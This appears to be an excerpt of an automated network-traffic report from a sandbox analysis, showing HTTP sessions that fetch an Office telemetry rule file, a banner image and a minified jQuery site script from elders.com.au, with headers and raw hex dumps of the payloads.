                                                                                                                                    2024-11-05 08:03:21 UTC451INData Raw: 20 31 39 2e 39 37 39 36 20 31 33 2e 33 34 31 35 43 32 30 2e 31 31 36 33 20 31 33 2e 32 33 34 38 20 32 30 2e 32 31 31 39 20 31 33 2e 30 38 34 31 20 32 30 2e 32 35 20 31 32 2e 39 31 34 39 4c 32 31 2e 37 35 20 36 2e 31 36 34 39 31 43 32 31 2e 37 37 35 31 20 36 2e 30 35 33 36 33 20 32 31 2e 37 37 34 35 20 35 2e 39 33 38 30 38 20 32 31 2e 37 34 38 33 20 35 2e 38 32 37 30 36 43 32 31 2e 37 32 32 20 35 2e 37 31 36 30 34 20 32 31 2e 36 37 30 38 20 35 2e 36 31 32 34 37 20 32 31 2e 35 39 38 35 20 35 2e 35 32 34 32 34 43 32 31 2e 35 32 36 31 20 35 2e 34 33 36 20 32 31 2e 34 33 34 37 20 35 2e 33 36 35 34 33 20 32 31 2e 33 33 30 39 20 35 2e 33 31 37 39 43 32 31 2e 32 32 37 32 20 35 2e 32 37 30 33 36 20 32 31 2e 31 31 34 20 35 2e 32 34 37 31 31 20 32 31 20 35 2e 32 34
                                                                                                                                    Data Ascii: 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.2272 5.27036 21.114 5.24711 21 5.24
                                                                                                                                    2024-11-05 08:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    87192.168.2.44985613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 479
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                    x-ms-request-id: f5f9e784-f01e-0071-765c-2e431c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080321Z-157b9fd754ft96xrhC1SN1efqn000000045g0000000015c1
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    88192.168.2.449861162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC681OUTGET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:23 UTC757INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                    Content-Length: 93735
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    Cf-Bgj: h2pri
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    content-disposition: attachment; filename="rpu_q2_2024_landingpagebanner.jpg"; filename*=UTF-8''rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                    etag: "0x8DCF3252165C79D"
                                                                                                                                    last-modified: Wed, 23 Oct 2024 05:39:57 GMT
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-served-by: cache-pao-kpao1770030-PAO
                                                                                                                                    x-timer: S1729727994.150794,VS0,VS0,VE1143
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b058292e55-DFW
                                                                                                                                    2024-11-05 08:03:23 UTC612INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 01 90 02 58 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIF``CCX"}!1AQa"q2
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 0c 03 01 00 02 11 03 11 00 3f 00 fd 53 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a
                                                                                                                                    Data Ascii: ?S((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 3f f8 9a f9 31 66 2d d2 b5 ac f5 27 da aa 57 24 77 34 a5 49 74 63 8d 56 df bc 8f a8 07 c4 2f 0f 9e 9a 86 40 f4 86 4f fe 26 a7 1e 36 d1 4b 60 5e e4 fb 44 e7 ff 00 65 af 9c 15 fc e5 46 f3 5a 35 04 36 d0 70 32 2b a6 d3 bc 4f 15 9c de 64 87 71 7e aa b8 c7 d6 b8 aa 73 c7 e0 d4 ed a6 a1 2f 8b 43 db 63 f1 76 93 34 81 12 e5 99 cf 45 10 c9 ff 00 c4 d3 e6 f1 46 9b 6f 8f 32 67 5c f4 cc 32 73 ff 00 8e d7 82 dc 78 aa 48 75 07 9e de 72 4e e2 46 7b 57 5d a5 f8 ea 4b bd 36 30 d2 07 74 e5 dd 80 27 71 ec 3f 0a c6 53 ab 05 76 8d 14 21 27 68 9e 92 3c 5d a5 16 0b f6 96 0c 7b 18 64 1f fb 2d 5e 87 54 b6 b8 5c c7 21 23 dd 18 7f 31 5e 55 ff 00 09 67 96 c1 80 52 dd 37 30 19 c5 69 27 8e 25 68 86 3c b5 e3 19 db 51 1c 43 fb 48 b9 50 fe 53 d1 fe d9 08 19 2f 81 ee 0d 54 7f 10 e9 f1 b1
                                                                                                                                    Data Ascii: ?1f-'W$w4ItcV/@O&6K`^DeFZ56p2+Odq~s/Ccv4EFo2g\2sxHurNF{W]K60t'q?Sv!'h<]{d-^T\!#1^UgR70i'%h<QCHPS/T
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: f3 c2 da 85 ac 22 13 11 73 26 e6 e4 82 0f 43 c5 5e 8f 4c 8e cd e3 30 c8 e8 37 02 ca 79 0c 71 fa 56 91 9c db d5 68 67 28 c5 2f 33 a4 fe d0 83 24 6f ff 00 c7 4f f8 51 59 54 57 49 9d 8d ea 28 a2 82 42 be 2d f8 c9 e3 99 bc 71 e3 6b d9 92 5d da 7d ab 1b 6b 44 07 e5 d8 a7 05 be ac 72 7e 98 1d ab eb bf 17 5e 3e 9b e1 3d 6a ee 26 db 24 16 53 4a ad e8 56 36 20 fe 95 f0 af f6 4b b0 f9 65 5c d6 f4 ad bb 30 ab 77 a2 2b ac a7 b9 a9 16 ec ad 29 d1 66 ef 22 d4 8b a3 7a c9 9a ea e6 47 37 23 05 d4 8a f7 a9 17 50 e7 ef 52 ae 8b 1f 77 34 d9 34 d8 93 a4 86 8e 64 1c 8c b5 0e a0 bc 64 d5 9f b6 c2 df c4 07 e3 59 5f 61 8d 7a 48 68 5b 78 d4 f0 f9 fa d2 d0 35 46 d2 de 26 46 d6 ce 3b ad 5d 86 ed 76 82 cd f8 56 14 4a 37 05 03 1e c0 54 fe 67 ef 02 74 ed 4a c8 d1 36 6c b5 d4 72 36 37
                                                                                                                                    Data Ascii: "s&C^L07yqVhg(/3$oOQYTWI(B-qk]}kDr~^>=j&$SJV6 Ke\0w+)f"zG7#PRw44ddY_azHh[x5F&F;]vVJ7TgtJ6lr67
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 05 91 10 e0 2f 99 83 8f c6 af 2b 36 d0 4a e0 e3 a6 7a 57 5c 36 39 e5 b8 ea 2a 1b 86 9b ca 3f 67 0a 65 ed e6 74 ac 69 6e b5 f0 38 b4 8c 77 f9 30 7f 0a a7 2e 51 25 73 79 51 63 5c 2a 85 1e c2 96 a8 e9 b7 97 37 11 e2 e6 d9 a1 7f ef 63 00 d5 dd d4 45 a6 b4 16 c2 d1 49 9a 33 54 00 ca 19 48 23 20 f5 06 92 38 d2 25 c2 28 41 fe cd 2e ea 5c d1 e6 01 45 14 50 01 45 14 50 01 45 14 50 01 47 bf 7a 28 a0 02 8a 28 a0 02 97 34 94 50 03 12 14 8d 99 95 15 59 8e 58 81 c9 a7 d1 9a 4d d4 00 b4 51 f8 d1 40 1b d4 51 45 04 18 3e 3d 05 bc 0b e2 20 06 49 d3 6e 46 07 fd 72 6a f8 de 3b 29 3f e7 93 7e 46 be ce f1 93 6d f0 86 b8 7d 2c 67 3f f9 0d ab e6 9b 1b c2 f8 52 03 0f a5 3e 67 15 74 8a 8c 14 dd 9b 38 f5 d3 d9 97 95 6f ca a5 5d 34 37 a8 af 50 b0 d1 e0 ba 64 25 23 e7 a8 c5 6d 37 c3
                                                                                                                                    Data Ascii: /+6JzW\69*?getin8w0.Q%syQc\*7cEI3TH# 8%(A.\EPEPEPGz((4PYXMQ@QE>= InFrj;)?~Fm},g?R>gt8o]47Pd%#m7
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 00 67 48 21 88 07 ff 00 59 ff 00 2c d9 88 55 1c f2 4f 4a fd 65 f3 bc d6 66 3d cd 76 60 e1 19 73 36 b4 fe ae 79 b8 fe 6a 73 8a be bf a7 43 35 3c 23 a4 2c 0f 09 b3 8d e3 73 93 b8 7f 2a cb be f8 5d e1 9b d9 0c 8d 65 e4 67 af 96 f8 5f ca ba 90 d4 1c 30 20 8c 83 d8 d7 a2 a9 c2 3f 0a b1 e5 73 c9 ee cf 3c 97 e0 a6 88 f2 e6 da f6 48 c6 79 8d 80 6f eb 52 c3 f0 66 c2 10 0a de 30 6e ff 00 27 1f ce bb af b3 c0 30 44 51 82 39 1f 2d 4a 5a 9f 2d fe 27 f8 b0 e6 b6 df 92 38 c8 7e 15 e9 f1 cc b2 1b 86 38 1f dd ef 5a 36 fe 07 82 dd 70 2e 9d b2 72 58 f0 7e 82 b8 9f da 1b e3 f5 87 c0 3f 0c 59 df 4d 67 fd a7 aa ea 32 bc 56 56 6c fb 13 08 01 79 5c f5 da b9 51 81 c9 24 0e 2a 8f c0 4f 8f 29 f1 3b c3 cd 3e ad 25 bd b5 f2 48 63 61 1f 19 6e a4 63 b2 e3 a1 e9 d4 67 8a e0 ab 57 0f 4e
                                                                                                                                    Data Ascii: gH!Y,UOJef=v`s6yjsC5<#,s*]eg_0 ?s<HyoRf0n'0DQ9-JZ-'8~8Z6p.rX~?YMg2VVly\Q$*O);>%HcancgWN
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: e1 ff 00 0a f8 5b c4 da ad f4 1a 4d c3 45 ad a5 8d e2 ff 00 62 dc ee c8 31 b2 0e 67 99 3f bd 9d 8b d3 0c dd 3e 1f f1 71 92 5b ad 8e d8 94 3b 23 ee ee 14 e1 4f fd f3 8a aa b3 2a dc 43 1a 80 b1 a1 da aa bc 01 d8 63 f3 ab 5e 2e 9b cc f1 15 cf 18 01 53 1d f9 2a 09 3f 9d 79 9a ca a7 3b dc fa 47 42 30 8c 69 47 63 1a 1b 57 3b 57 7a 28 ed f2 d7 55 a1 58 dc 2c e8 e6 f6 de 36 fb b1 c9 2a 30 03 fd 96 2b 93 b4 9c 76 e3 ad 72 e6 62 14 9c f4 e9 56 ec f5 26 db e4 0f 94 13 bb 76 7d b9 a2 a2 94 91 e8 61 9d 1a 72 b4 95 fe 6c fd 7d fd 89 fe 1e e9 5e 09 f8 43 36 a7 a5 eb 30 f8 81 fc 45 76 2e e5 bf 87 82 8a 88 02 5b 48 a1 99 55 e2 63 20 3b 78 6c 86 ef 5f 41 29 af cb 6f d8 17 e2 b5 ff 00 81 fe 33 69 da 07 da 9b fb 03 c4 b2 0b 1b cb 57 6f 93 cd 2a 7c 99 80 e8 1c 30 db 9e e1 88
                                                                                                                                    Data Ascii: [MEb1g?>q[;#O*Cc^.S*?y;GB0iGcW;Wz(UX,6*0+vrbV&v}arl}^C60Ev.[HUc ;xl_A)o3iWo*|0
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 6c e3 1b 25 76 63 79 7a bb 90 22 86 52 c7 81 f2 e4 d5 5d 49 75 8b 49 14 de 79 d1 e3 e5 1b fa 7d 2b ab fe dc d6 63 55 db 6d 3a 10 3f 78 c1 08 f3 3d 09 e3 8c 7b 56 75 dd e5 e5 f6 56 e6 de 49 b1 c1 57 8d 8f ff 00 aa b4 85 49 27 ac 51 12 82 6b 76 72 bb c3 48 0c 9b 48 f5 02 9e ac 8a 7e 42 0d 6d 9b 3b 5e 37 58 48 be bd 46 7f 4a 9f 6e 94 9c 2e 96 c7 d7 cc 95 89 fc 30 2b a1 e2 17 f2 bf c0 c5 51 7d ff 00 33 9e 69 24 6e 00 e2 93 74 9c 67 35 b9 24 7a 73 0c 0b 42 9f f6 d4 d4 96 c3 4b 8b fd 65 9b ca 7b 7e fc 8f e9 47 d6 34 f8 43 d8 eb b9 83 b9 f3 8c 1a 5d cf dc e2 ba 91 a8 5a 2a 85 8e c6 38 47 e0 c7 f3 35 22 de 5a 6c da 6d 23 93 dd d5 4f f4 ac be b1 2f e4 34 f6 2b f9 8e 50 37 bd 38 49 cf 5a e9 bc eb 2c e7 ec 63 ea 31 fe 15 24 73 59 46 a7 64 41 4b 75 c2 2e 69 7d 61 ff
                                                                                                                                    Data Ascii: l%vcyz"R]IuIy}+cUm:?x={VuVIWI'QkvrHH~Bm;^7XHFJn.0+Q}3i$ntg5$zsBKe{~G4C]Z*8G5"Zlm#O/4+P78IZ,c1$sYFdAKu.i}a
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 53 9e 43 64 74 ae 93 4f b3 9e 35 65 9c e1 08 c6 cc f5 a9 af 0c d0 ac 62 08 84 ab d0 86 1b 88 fc e8 f6 72 6b 99 b0 f6 8a f6 48 c6 b6 f1 43 c7 1e d9 21 13 38 e8 f9 c1 3f 5a b2 be 26 2c 06 6d 80 fa 36 6b 49 6c e0 91 77 4b 6f 11 72 3e 6f 94 56 3d d6 e8 59 91 2c 8f 96 09 01 8a 93 55 2f 69 04 b5 12 e4 93 d8 b6 9e 23 8d 9b 06 06 03 d7 70 a9 17 5f 87 6f fa a7 dd e9 91 8a c5 67 19 e6 dc c7 ea 70 6a 41 24 27 f8 71 ed 51 ed a7 dc bf 67 1e c6 a4 da d2 49 1b 2a c6 41 23 ab 1e 94 5a eb 11 ac 61 1a 36 ca 8e 58 11 cd 53 91 6c 7e ce a0 39 32 b7 3c 37 4a a5 26 d5 e1 7f 9d 0e ac 93 bd c1 42 2f 4b 1b bf db 96 fd 0a bf e1 8a 46 d7 ed a3 ea b2 7e 42 b9 d4 ff 00 81 1a 56 d3 ef 25 f9 96 d6 72 3b 7c b5 3f 58 a8 f6 1f b2 87 53 72 4d 6a c6 e5 76 ca 92 7d 31 4d 17 7a 53 63 fd 1f 3f
                                                                                                                                    Data Ascii: SCdtO5ebrkHC!8?Z&,m6kIlwKor>oV=Y,U/i#p_ogpjA$'qQgI*A#Za6XSl~92<7J&B/KF~BV%r;|?XSrMjv}1MzSc?
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 2f 6a 54 0c fe ee e4 ff 00 51 59 ba d4 23 bc e3 ff 00 81 c4 b5 77 b5 fe e6 7a 95 af 85 ac 2d 58 3c 8a 66 38 e5 64 20 8a 4b cd 0f 4f 8d 59 97 4f 66 18 cf ee 5c 83 ff 00 d6 af 36 4f 8a 7a 23 72 d2 ed 3d 3e 59 95 b9 ac cd 7f e3 c7 87 fc 23 62 9a 95 fd dc b0 d9 34 ab 0f 9d 6e af 39 46 73 84 dc 14 70 18 e1 41 3c 64 81 91 9a 16 2a 83 f7 54 a3 ff 00 81 45 94 a1 26 fa fd cc f4 8c 68 d1 b0 12 59 dc 21 f4 67 38 a8 2f 17 48 92 3f f4 78 6e 23 7c f5 dc 31 fa d7 1f a5 fc 6b d2 3c 45 0c be 4d e4 c6 28 65 6b 77 37 80 41 fb d5 c6 f8 c0 90 02 59 09 01 80 c8 19 1c f3 57 e4 f1 a6 9d 71 f2 c7 6d 18 95 54 b1 54 94 06 20 0e 4e de b8 fa 0a 3d a4 5e 9c cb ef 57 34 71 71 7e f2 7f 89 bd a6 db da ad f4 52 99 65 8c c7 fb c1 c0 3f 32 8c 8f d4 57 e0 de a9 78 75 3d 6b 50 b9 92 53 24 d7
                                                                                                                                    Data Ascii: /jTQY#wz-X<f8d KOYOf\6Oz#r=>Y#b4n9FspA<d*TE&hY!g8/H?xn#|1k<EM(ekw7AYWqmTT N=^W4qq~Re?2Wxu=kPS$


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    89192.168.2.449871162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC463OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:22 UTC628INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Mon, 30 Sep 2024 10:02:26 GMT
                                                                                                                                    etag: W/"250df-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 507990
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210119-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1727690545.479718,VS0,VS0,VE1003
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2ab496bc5-DFW
                                                                                                                                    2024-11-05 08:03:22 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 73 69 74 65 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 65 78 70 6f 72 74 73 3f 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 6e 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20
                                                                                                                                    Data Ascii: 7d2a/*! For license information please see site.js.LICENSE.txt */!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 6e 74 2c 77 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 6f 2c 69 3d 28 6e 3d 6e 7c 7c 62 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 69 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 77 29 28 6f 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 6f 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29
                                                                                                                                    Data Ascii: nt,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e)
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 2e 70 75 73 68 53 74 61 63 6b 28 6e 3e 3d 30 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 63 2c 73 6f 72 74 3a 69 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 69 2e 73 70 6c 69 63 65 7d 2c 43 2e 65 78 74 65 6e 64 3d 43 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 2c 69 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 63 3d 61
                                                                                                                                    Data Ascii: .pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:c,sort:i.sort,splice:i.splice},C.extend=C.fn.extend=function(){var e,t,n,r,o,i,a=arguments[0]||{},s=1,l=arguments.length,c=!1;for("boolean"==typeof a&&(c=a
